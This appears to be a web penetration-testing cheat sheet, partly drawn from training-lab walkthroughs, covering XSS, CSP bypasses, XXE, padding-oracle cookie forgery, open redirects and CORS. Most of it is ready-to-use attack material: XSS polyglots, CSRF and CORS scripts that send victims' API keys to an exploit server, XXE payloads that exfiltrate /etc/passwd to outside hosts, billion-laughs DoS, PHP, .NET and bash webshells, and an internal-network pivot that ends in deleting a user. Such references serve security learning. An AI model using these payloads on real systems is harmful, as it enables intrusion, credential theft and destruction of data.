%3C!%27/!%22/!\%27/\%22/ — !%3E%3C/Title/%3C/script/%3E%3CInput%20Type=Text%20Style=position:fixed;top:0;left:0;font-size:999px%20*/;%20Onmouseenter=confirm1%20//%3E#
<!'/!”/!\'/\"/ — !></Title/</script/><Input Type=Text Style=position:fixed;top:0;left:0;font-size:999px */; Onmouseenter=confirm1 //>#
jaVasCript:/-//*\/'/"/*/(/ */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e
">>

” ></plaintext></|><plaintext/onmouseover=prompt(1) >prompt(1)@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>’ →” > "></script>alert(1)”><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'">">

" onclick=alert(1)//<button ' onclick=alert(1)//> */ alert(1)//

?msg=<img/src=`%00`%20onerror=this.onerror=confirm(1)
<svg/onload=eval(atob(‘YWxlcnQoJ1hTUycp’))>

<sVg/oNloAd=”JaVaScRiPt:/**\/*\’/”\eval(atob(‘Y29uZmlybShkb2N1bWVudC5kb21haW4pOw==’))”> <iframe src=jaVaScrIpT:eval(atob(‘Y29uZmlybShkb2N1bWVudC5kb21haW4pOw==’))>

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert())//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouse over=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><imgsrc="http://i.imgur.com/P8mL8.jpg">

Reflected XSS

The application receive data request and include it in the reponse without processing.

https://insecure-website.com/status?message=<script>alert(1)</script>

- Test every entry point including HTTP headers
- Submit random alphanumeric values, 8 chars to easily find the reflection. Burp Intruder grep payloads. 
- Determine the reflection context. Could be between html tags, quoted, javascript string...
- Test candidate payloads. Burp repeater, place the payload before or after the number and search the number to locate the payload.
- Test alternative payload. If the payload is modified look for alternative with the same context.

Stored XSS

Also known as persistent or second order. The application receive data from untrusted source and include it in later HTTP response in an unsafe way.

Save a comment in a web:

POST /post/comment HTTP/1.1
Host: vulnerable-website.com
Content-Length: 100

postId=%3Cscript%3E%2F*%2BBad%2Bstuff%2Bhere...%2B*%2F%3C%2Fscript%3E&name=Carlos+Montoya&email=carlos%40normal-user.net

Check for entry points:
- Parameters or other data within the URL query string and message body.
- The URL file path.
- HTTP request headers that might not be exploitable in relation to reflected XSS.

Check for exit points:
- Data submitted to any entry point could in principle be emitted from any exit point. For example, user-supplied display names could appear within an obscure audit log that is only visible to some application users.
- Data that is currently stored by the application is often vulnerable to being overwritten due to other actions performed within the application. For example, a search function might display a list of recent searches, which are quickly replaced as users perform other searches.

Blind XSS

**Tools**
https://github.com/LewisArdern/bXSS
https://github.com/ssl/ezXSS

DOM XSS

Application contains some client-side JavaScript that processes data from an untrusted source in an unsafe way, usually by writing the data back to the DOM.

Example:

var search = document.getElementById('search').value;
var results = document.getElementById('results');
results.innerHTML = 'You searched for: ' + search;

You searched for: <img src=1 onerror='/* Bad stuff here... */'>

You have to locate your input in the DOM with browser developer tools.

- Reflected DOM XSS
- Stored DOM XSS


Possible sinks:

document.write()
document.writeln()
document.domain
someDOMElement.innerHTML
someDOMElement.outerHTML
someDOMElement.insertAdjacentHTML
someDOMElement.onevent

JQuery:

add()
after()
append()
animate()
insertAfter()
insertBefore()
before()
html()
prepend()
replaceAll()
replaceWith()
wrap()
wrapInner()
wrapAll()
has()
constructor()
init()
index()
jQuery.parseHTML()
$.parseHTML()

XSS to CSRF

Example:

Detect action to change email, with anti csrf token, get it and paste this in a comment to change user email:

<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/email',true);
req.send();
function handleResponse() {
    var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
    var changeReq = new XMLHttpRequest();
    changeReq.open('post', '/email/change-email', true);
    changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>

AngularJS Sandbox

Removed in AngularJS 1.6

Is a way to avoid some strings like window, document or __proto__.

- Without strings:
/?search=1&toString().constructor.prototype.charAt%3d[].join;[1]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)=1

The exploit uses toString() to create a string without using quotes. It then gets the String prototype and overwrites the charAt function for every string. This effectively breaks the AngularJS sandbox. Next, an array is passed to the orderBy filter. We then set the argument for the filter by again using toString() to create a string and the String constructor property. Finally, we use the fromCharCode method generate our payload by converting character codes into the string x=alert(1). Because the charAt function has been overwritten, AngularJS will allow this code where normally it would not.

- With CSP:

<script>
location='https://your-lab-id.web-security-academy.net/?search=%3Cinput%20id=x%20ng-focus=$event.path|orderBy:%27(z=alert)(document.cookie)%27%3E#x';
</script>

The exploit uses the ng-focus event in AngularJS to create a focus event that bypasses CSP. It also uses $event, which is an AngularJS variable that references the event object. The path property is specific to Chrome and contains an array of elements that triggered the event. The last element in the array contains the window object.
Normally, | is a bitwise or operation in JavaScript, but in AngularJS it indicates a filter operation, in this case the orderBy filter. The colon signifies an argument that is being sent to the filter. In the argument, instead of calling the alert function directly, we assign it to the variable z. The function will only be called when the orderBy operation reaches the window object in the $event.path array. This means it can be called in the scope of the window without an explicit reference to the window object, effectively bypassing AngularJS's window check.

XSS in JS

- Inside JS script:
</script><img src=1 onerror=alert(document.domain)>
</script><script>alert(1)</script>

- Inside JS literal script:
'-alert(document.domain)-'
';alert(document.domain)//
'-alert(1)-'

- Inside JS that escape special chars:
If ';alert(document.domain)// is converted in \';alert(document.domain)//
Use \';alert(document.domain)// to obtain \\';alert(document.domain)//
\'-alert(1)//

- Inside JS with some char blocked:
onerror=alert;throw 1
/post?postId=5&%27},x=x=%3E{throw/**/onerror=alert,1337},toString=x,window%2b%27%27,{x:%27

The exploit uses exception handling to call the alert function with arguments. The throw statement is used, separated with a blank comment in order to get round the no spaces restriction. The alert function is assigned to the onerror exception handler. As throw is a statement, it cannot be used as an expression. Instead, we need to use arrow functions to create a block so that the throw statement can be used. We then need to call this function, so we assign it to the toString property of window and trigger this by forcing a string conversion on window.

- Inside {}
${alert(document.domain)}
${alert(1)}

CSP

Content-Security-Policy Header

- If upload from web is allowed or <img src="URL">:
https://medium.com/@shahjerry33/pixel-that-steals-data-im-invisible-3c938d4c3888
https://iplogger.org/invisible/
https://iplogger.org/15bZ87

Scenario : 1
Content-Security-Policy: script-src https://facebook.com https://google.com 'unsafe-inline' https://*; child-src 'none'; report-uri /Report-parsing-url;By  observing this policy we can say it's damn vulnerable and will allow  inline scripting as well . The reason behind that is the usage of  unsafe-inline source as a value of script-src directive.
working payload : "/><script>alert(1337);</script>

Scenario : 2
Content-Security-Policy: script-src https://facebook.com https://google.com 'unsafe-eval' data: http://*; child-src 'none'; report-uri /Report-parsing-url;Again this is a misconfigured CSP policy due to usage of unsafe-eval.
working payload : <script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>

Scenario : 3
Content-Security-Policy: script-src 'self' https://facebook.com https://google.com https: data *; child-src 'none'; report-uri /Report-parsing-url;Again this is a misconfigured CSP policy due to usage of a wildcard in script-src.
working payloads :"/>'><script src=https://attacker.com/evil.js></script>"/>'><script src=data:text/javascript,alert(1337)></script>

Scenario: 4
Content-Security-Policy: script-src 'self' report-uri /Report-parsing-url;Misconfigured CSP policy again! we can see object-src and default-src are missing here.
working payloads :<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>">'><object type="application/x-shockwave-flash" data='https: //ajax.googleapis.com/ajax/libs/yui/2.8.0 r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e) {alert(1337)}//'>
<param name="AllowScriptAccess" value="always"></object>

Scenario: 5
Content-Security-Policy: script-src 'self'; object-src 'none' ; report-uri /Report-parsing-url;we  can see object-src is set to none but yes this CSP can be bypassed too  to perform XSS. How ? If the application allows users to upload any type  of file to the host. An attacker can upload any malicious script and  call within any tag.
working payloads :"/>'><script src="/user_upload/mypic.png.js"></script>

Scenario : 6
Content-Security-Policy: script-src 'self' https://www.google.com; object-src 'none' ; report-uri /Report-parsing-url;In such scenarios where script-src is set to self and a particular domain which is whitelisted, it can be bypassed using jsonp. jsonp endpoints allow insecure callback methods which allow an attacker to perform xss.
working payload :"><script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script>

Scenario : 7
Content-Security-Policy: script-src 'self' https://cdnjs.cloudflare.com/; object-src 'none' ; report-uri /Report-parsing-url;In  such scenarios where script-src is set to self and a javascript library  domain which is whitelisted. It can be bypassed using any vulnerable  version of javascript file from that library , which allows the attacker  to perform xss.
working payloads :<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script>

<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.8/angular.js" /></script>
 <div ng-app ng-csp>
  {{ x = $on.curry.call().eval("fetch('http://localhost/index.php').then(d => {})") }}
 </div>"><script src="https://cdnjs.cloudflare.com/angular.min.js"></script> <div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div>"><script src="https://cdnjs.cloudflare.com/angularjs/1.1.3/angular.min.js"> </script>
<div ng-app ng-csp id=p ng-click=$event.view.alert(1337)>

Scenario : 8
Content-Security-Policy: script-src 'self' ajax.googleapis.com; object-src 'none' ;report-uri /Report-parsing-url;If  the application is using angular JS and scripts are loaded from a  whitelisted domain. It is possible to bypass this CSP policy by calling  callback functions and vulnerable class. For more details visit this  awesome git repo.
working payloads :ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>"><script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script>

Scenario : 9
Content-Security-Policy: script-src 'self' accounts.google.com/random/ website.with.redirect.com ; object-src 'none' ; report-uri /Report-parsing-url;In  the above scenario, there are two whitelisted domains from where  scripts can be loaded to the webpage. Now if one domain has any open  redirect endpoint CSP can be bypassed easily. The reason behind that is  an attacker can craft a payload using redirect domain targeting to other  whitelisted domains having a jsonp endpoint. And in this scenario XSS  will execute because while redirection browser only validated host, not  the path parameters.
working payload :">'><script src="https://website.with.redirect.com/redirect?url=https%3A//accounts.google.com/o/oauth2/revoke?callback=alert(1337)"></script>">

Scenario : 10
Content-Security-Policy: 
default-src 'self' data: *; connect-src 'self'; script-src  'self' ;
report-uri /_csp; upgrade-insecure-requestsTHE  above CSP policy can be bypassed using iframes. The condition is that  application should allow iframes from the whitelisted domain. Now using a  special attribute srcdoc of iframe, XSS can be easily achieved.
working payloads :<iframe srcdoc='<script src="data:text/javascript,alert(document.domain)"></script>'></iframe>* sometimes it can be achieved using defer& async attributes of script within iframe (most of the time in new browser due to SOP it fails but who knows when you are lucky?)<iframe src='data:text/html,<script defer="true" src="data:text/javascript,document.body.innerText=/hello/"></script>'></iframe>


Mitigation : Proxy all the objects from third-party resources and create a   b . Although this is only one way of mitigation, their could be many.

- CSP with policy injection (only Chrome)
/?search=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&token=;script-src-elem%20%27unsafe-inline%27

XXE

XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any backend or external systems that the application itself can access.

- XXE to Retrieve files:

Suppose a shopping application checks for the stock level of a product by submitting the following XML to the server:
<?xml version="1.0" encoding="UTF-8"?>
<stockCheck><productId>381</productId></stockCheck>
The application performs no particular defenses against XXE attacks, so you can exploit the XXE vulnerability to retrieve the /etc/passwd file by submitting the following XXE payload:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>
This XXE payload defines an external entity &xxe; whose value is the contents of the /etc/passwd file and uses the entity within the productId value. This causes the application's response to include the contents of the file:
Invalid product ID: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin

Visit a product page, click "Check stock", and intercept the resulting POST request in Burp Suite.
Insert the following external entity definition in between the XML declaration and the stockCheck element:
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
Then replace the productId number with a reference to the external entity: &xxe;
The response should contain "Invalid product ID:" followed by the contents of the /etc/passwd file.

- XXE to SSRF:

Visit a product page, click "Check stock", and intercept the resulting POST request in Burp Suite.
Insert the following external entity definition in between the XML declaration and the stockCheck element:
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/"> ]>
Then replace the productId number with a reference to the external entity: &xxe;
The response should contain "Invalid product ID:" followed by the response from the metadata endpoint, which will initially be a folder name. Iteratively update the URL in the DTD to explore the API until you reach /latest/meta-data/iam/security-credentials/admin. This should return JSON containing the SecretAccessKey.

https://medium.com/@klose7/https-medium-com-klose7-xxe-attacks-part-1-xml-basics-6fa803da9f26
https://medium.com/@klose7/xxe-attacks-part-2-xml-dtd-related-attacks-a572e8deb478
https://medium.com/@onehackman/exploiting-xml-external-entity-xxe-injections-b0e3eac388f9
https://medium.com/@ismailtasdelen/xml-external-entity-xxe-injection-payload-list-937d33e5e116
https://lab.wallarm.com/xxe-that-can-bypass-waf-protection-98f679452ce0/?fbclid=IwAR1M7QwQHf1rMJb_6Qb9HFdLbVBRhmr3FYl7dalh8LHCLuHiOU3ypWwPBxo

XXE
1. change password func -> JSON
2. converted to XML -> 200 OK
3. created dtd file on my ec2 and started webserver on port 80
4. crafted a XXE payload!
5. bounty!
Always convert POST/PUT/PATCH body to xml and resend req, don't forget to change the content-type.

# XXE
# Instead POST:

<?xml version="1.0" ?>
    <!DOCTYPE thp [
        <!ELEMENT thp ANY>
        <!ENTITY book "Universe">
    ]>
    <thp>Hack The &book;</thp>

Malicious XML:

<?xml version="1.0" ?><!DOCTYPE thp [ <!ELEMENT thp ANY>
<!ENTITY book SYSTEM "file:///etc/passwd">]><thp>Hack The
%26book%3B</thp>

# XXE OOB

<?xml version="1.0"?><!DOCTYPE thp [<!ELEMENT thp ANY >
<!ENTITY % dtd SYSTEM "http://example.com/payload.dtd"> %dtd;]>
<thp><error>%26send%3B</error></thp>

# Basic Test

<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY example "Doe"> ]>
 <userInfo>
  <firstName>John</firstName>
  <lastName>&example;</lastName>
 </userInfo>

# Classic XXE

<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<data>&file;</data>

<?xml version="1.0" encoding="ISO-8859-1"?>
  <!DOCTYPE foo [  
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [  
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>

Classic XXE Base64 encoded

<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>

# PHP Wrapper inside XXE

<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<contacts>
  <contact>
    <name>Jean &xxe; Dupont</name>
    <phone>00 11 22 33 44</phone>
    <adress>42 rue du CTF</adress>
    <zipcode>75000</zipcode>
    <city>Paris</city>
  </contact>
</contacts>

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "php://filter/convert.bae64-encode/resource=http://10.0.0.3" >
]>
<foo>&xxe;</foo>

# Deny Of Service - Billion Laugh Attack

<!DOCTYPE data [
<!ENTITY a0 "dos" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
]>
<data>&a4;</data>

# Yaml attack

a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]


# Blind XXE

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "file:///etc/passwd" >
<!ENTITY callhome SYSTEM "www.malicious.com/?%xxe;">
]
>
<foo>&callhome;</foo>

# XXE OOB Attack (Yunusov, 2013)

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd">
<data>&send;</data>

File stored on http://publicServer.com/parameterEntity_oob.dtd
<!ENTITY % file SYSTEM "file:///sys/power/image_size">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>">
%all;

# XXE OOB with DTD and PHP filter

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://92.222.81.2/dtd.xml">
%sp;
%param1;
]>
<r>&exfil;</r>

File stored on http://92.222.81.2/dtd.xml
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://92.222.81.2/dtd.xml?%data;'>">

# XXE Inside SOAP

<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>

# XXE PoC

<!DOCTYPE xxe_test [ <!ENTITY xxe_test SYSTEM "file:///etc/passwd"> ]><x>&xxe_test;</x>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe_test [ <!ENTITY xxe_test SYSTEM "file:///etc/passwd"> ]><x>&xxe_test;</x>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe_test [<!ELEMENT foo ANY><!ENTITY xxe_test SYSTEM "file:///etc/passwd">]><foo>&xxe_test;</foo>

XXE Hidden Attack

- Xinclude

Visit a product page, click "Check stock", and intercept the resulting POST request in Burp Suite.
Set the value of the productId parameter to:
<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>

- File uploads:

Create a local SVG image with the following content:
<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>
Post a comment on a blog post, and upload this image as an avatar.
When you view your comment, you should see the contents of the /etc/hostname file in your image. Then use the "Submit solution" button to submit the value of the server hostname.

Cookies

Cookies error padding:

# Get cookie structure
padbuster http://10.10.119.56/index.php xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka 8 -cookies "hcon=xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka" -error "Invalid padding"

# Get cookie for other user (impersonation)
padbuster http://10.10.119.56/index.php xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka 8 -cookies "hcon=xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka" -error "Invalid padding" -plaintext 'user=administratorhc0nwithyhackme'

Webshells

PHP

# system

CURL http://ip/shell.php?1=whoami
www.somewebsite.com/index.html?1=ipconfig

# passthru 


# NINJA
;").($_^"/"); ?> 
http://target.com/path/to/shell.php?=function&=argument
http://target.com/path/to/shell.php?=system&=ls

# NINJA 2
/'^'{{{{';@${$_}[_](@${$_}[__]);

.NET

<%@Page Language=”C#”%><%var p=new System.Diagnostics.Process{StartInfo={FileName=Request[“c”],UseShellExecute=false,RedirectStandardOutput=true}};p.Start();%><%=p.StandardOutput.ReadToEnd()%>
www.somewebsite.com/cgi-bin/a?ls%20/var

BASH

#!/bin/sh
echo;$_ `${QUERY_STRING/%20/ }`
www.somewebsite.com/cgi-bin/a?ls%20/var

Open Redirect

https://web.com/r/?url=https://phising-malicious.com
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect

- Search in Burp:
“=http” or “=aHR0”（base64 encode http）

- Reflected parameters:
url
rurl
u
next
link
lnk
go
target
dest
destination
redir
redirect_uri
redirect_url
redirect
r
view
loginto
image_url
return
returnTo
return_to
continue
return_path
path

- Dom based:
location
location.host
location.hostname
location.href
location.pathname
location.search
location.protocol
location.assign()
location.replace()
open()
domElem.srcdoc
jQuery.ajax()
$.ajax()
XMLHttpRequest.open()
XMLHttpRequest.send()

CORS

**Tools**
# https://github.com/s0md3v/Corsy
python3 corsy.py -u https://example.com

# https://github.com/chenjj/CORScanner
python cors_scan.py -u example.com

Cross-origin resource sharing (CORS) is a browser mechanism which enables controlled access to resources located outside of a given domain. It extends and adds flexibility to the same-origin policy (SOP). However, it also provides potential for cross-domain based attacks, if a website's CORS policy is poorly configured and implemented. CORS is not a protection against cross-origin attacks such as cross-site request forgery (CSRF).

The same-origin policy is a restrictive cross-origin specification that limits the ability for a website to interact with resources outside of the source domain. The same-origin policy was defined many years ago in response to potentially malicious cross-domain interactions, such as one website stealing private data from another. It generally allows a domain to issue requests to other domains, but not to access the responses.

| URL accessed | Access permitted? |
| http://normal-website.com/example/ | Yes: same scheme, domain, and port |
| http://normal-website.com/example2/ | Yes: same scheme, domain, and port |
| https://normal-website.com/example/ | No: different scheme and port |
| http://en.normal-website.com/example/ | No: different domain |
| http://www.normal-website.com/example/ | No: different domain |
| http://normal-website.com:8080/example/ | No: different port* |


There are various exceptions to the same-origin policy:
• Some objects are writable but not readable cross-domain, such as the location object or the location.href property from iframes or new windows.
• Some objects are readable but not writable cross-domain, such as the length property of the window object (which stores the number of frames being used on the page) and the closed property.
• The replace function can generally be called cross-domain on the location object.
• You can call certain functions cross-domain. For example, you can call the functions close, blur and focus on a new window. The postMessage function can also be called on iframes and new windows in order to send messages from one domain to another.

Access-Control-Allow-Origin header is included in the response from one website to a request originating from another website, and identifies the permitted origin of the request. A web browser compares the Access-Control-Allow-Origin with the requesting website's origin and permits access to the response if they match.

CORS good example:
https://hackerone.com/reports/235200

- CORS with basic origin reflection:

    With your browser proxying through Burp Suite, turn intercept off, log into your account, and click "Account Details".
    Review the history and observe that your key is retrieved via an AJAX request to /accountDetails, and the response contains the Access-Control-Allow-Credentials header suggesting that it may support CORS.
    Send the request to Burp Repeater, and resubmit it with the added header: Origin: https://example.com
    Observe that the origin is reflected in the Access-Control-Allow-Origin header.
    Now browse to the exploit server, enter the following HTML, replacing $url with the URL for your specific lab and test it by clicking "view exploit":
    <script>
       var req = new XMLHttpRequest();
       req.onload = reqListener;
       req.open('get','$url/accountDetails',true);
       req.withCredentials = true;
       req.send();

       function reqListener() {
           location='/log?key='+this.responseText;
       };
    </script>
    Observe that the exploit works - you have landed on the log page and your API key is in the URL.
    Go back to the exploit server and click "Deliver exploit to victim".
    Click "Access log", retrieve and submit the victim's API key to complete the lab.

 - Whitelisted null origin value

     With your browser proxying through Burp Suite, turn intercept off, log into your account, and click "My account".
    Review the history and observe that your key is retrieved via an AJAX request to /accountDetails, and the response contains the Access-Control-Allow-Credentials header suggesting that it may support CORS.
    Send the request to Burp Repeater, and resubmit it with the added header Origin: null.
    Observe that the "null" origin is reflected in the Access-Control-Allow-Origin header.
    Now browse to the exploit server, enter the following HTML, replacing $url with the URL for your specific lab, $exploit-server-url with the exploit server URL, and test it by clicking "view exploit":
    <iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html, <script>
       var req = new XMLHttpRequest ();
       req.onload = reqListener;
       req.open('get','$url/accountDetails',true);
       req.withCredentials = true;
       req.send();

       function reqListener() {
           location='$exploit-server-url/log?key='+encodeURIComponent(this.responseText);
       };
    </script>"></iframe>
    Notice the use of an iframe sandbox as this generates a null origin request. Observe that the exploit works - you have landed on the log page and your API key is in the URL.
    Go back to the exploit server and click "Deliver exploit to victim".
    Click "Access log", retrieve and submit the victim's API key to complete the lab.

- CORS with insecure certificate

    With your browser proxying through Burp Suite, turn intercept off, log into your account, and click "Account Details".
    Review the history and observe that your key is retrieved via an AJAX request to /accountDetails, and the response contains the Access-Control-Allow-Credentials header suggesting that it may support CORS.
    Send the request to Burp Repeater, and resubmit it with the added header Origin: http://subdomain.lab-id where lab-id is the lab domain name.
    Observe that the origin is reflected in the Access-Control-Allow-Origin header, confirming that the CORS configuration allows access from arbitrary subdomains, both HTTPS and HTTP.
    Open a product page, click "Check stock" and observe that it is loaded using a HTTP URL on a subdomain.
    Observe that the productID parameter is vulnerable to XSS.
    Now browse to the exploit server, enter the following HTML, replacing $your-lab-url with your unique lab URL and $exploit-server-url with your exploit server URL and test it by clicking "view exploit":
    <script>
       document.location="http://stock.$your-lab-url/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://$your-lab-url/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://$exploit-server-url/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
    </script>
    Observe that the exploit works - you have landed on the log page and your API key is in the URL.
    Go back to the exploit server and click "Deliver exploit to victim".
    Click "Access log", retrieve and submit the victim's API key to complete the lab.

- CORS with pivot attack

Step 1
First we need to scan the local network for the endpoint. Replace $collaboratorPayload with your own Collaborator payload or exploit server URL. Enter the following code into the exploit server. Click store then "Deliver exploit to victim". Inspect the log or the Collaborator interaction and look at the code parameter sent to it.
<script>
var q = [], collaboratorURL = 'http://$collaboratorPayload';
for(i=1;i<=255;i++){
  q.push(
  function(url){
    return function(wait){
    fetchUrl(url,wait);
    }
  }('http://192.168.0.'+i+':8080'));
}
for(i=1;i<=20;i++){
  if(q.length)q.shift()(i*100);
}
function fetchUrl(url, wait){
  var controller = new AbortController(), signal = controller.signal;
  fetch(url, {signal}).then(r=>r.text().then(text=>
    {
    location = collaboratorURL + '?ip='+url.replace(/^http:\/\//,'')+'&code='+encodeURIComponent(text)+'&'+Date.now()
  }
  ))
  .catch(e => {
  if(q.length) {
    q.shift()(wait);
  }
  });
  setTimeout(x=>{
  controller.abort();
  if(q.length) {
    q.shift()(wait);
  }
  }, wait);
}
</script>
Step 2
Clear the code from stage 1 and enter the following code in the exploit server. Replace $ip with the IP address and port number retrieved from your collaborator interaction. Don't forget to add your Collaborator payload or exploit server URL again. Update and deliver your exploit. We will now probe the username field for an XSS vulnerability. You should retrieve a Collaborator interaction with foundXSS=1 in the URL or you will see foundXSS=1 in the log.
<script>
function xss(url, text, vector) {
  location = url + '/login?time='+Date.now()+'&username='+encodeURIComponent(vector)+'&password=test&csrf='+text.match(/csrf" value="([^"]+)"/)[1];
}

function fetchUrl(url, collaboratorURL){
  fetch(url).then(r=>r.text().then(text=>
  {
    xss(url, text, '"><img src='+collaboratorURL+'?foundXSS=1>');
  }
  ))
}

fetchUrl("http://$ip", "http://$collaboratorPayload");
</script>

Step 3
Clear the code from stage 2 and enter the following code in the exploit server. Replace $ip with the same IP address and port number as in step 2 and don't forget to add your Collaborator payload or exploit server again. Update and deliver your exploit. Your Collaborator interaction or your exploit server log should now give you the source code of the admin page.
<script>
function xss(url, text, vector) {
  location = url + '/login?time='+Date.now()+'&username='+encodeURIComponent(vector)+'&password=test&csrf='+text.match(/csrf" value="([^"]+)"/)[1];
}
function fetchUrl(url, collaboratorURL){
  fetch(url).then(r=>r.text().then(text=>
  {
    xss(url, text, '"><iframe src=/admin onload="new Image().src=\''+collaboratorURL+'?code=\'+encodeURIComponent(this.contentWindow.document.body.innerHTML)">');
  }
  ))
}

fetchUrl("http://$ip", "http://$collaboratorPayload");
</script>
Step 4
Read the source code retrieved from step 3 in your Collaborator interaction or on the exploit server log. You'll notice there's a form that allows you to delete a user. Clear the code from stage 3 and enter the following code in the exploit server. Replace $ip with the same IP address and port number as in steps 2 and 3. The code submits the form to delete carlos by injecting an iframe pointing to the /admin page.
<script>
function xss(url, text, vector) {
  location = url + '/login?time='+Date.now()+'&username='+encodeURIComponent(vector)+'&password=test&csrf='+text.match(/csrf" value="([^"]+)"/)[1];
}

function fetchUrl(url){
  fetch(url).then(r=>r.text().then(text=>
  {
    xss(url, text, '"><iframe src=/admin onload="var f=this.contentWindow.document.forms[0];if(f.username)f.username.value=\'carlos\',f.submit()">');
  }
  ))
}

fetchUrl("http://$ip");
</script>
Click on "Deliver exploit to victim" to submit the code. Once you have submitted the form to delete user carlos then you have completed the lab.

# JSONP

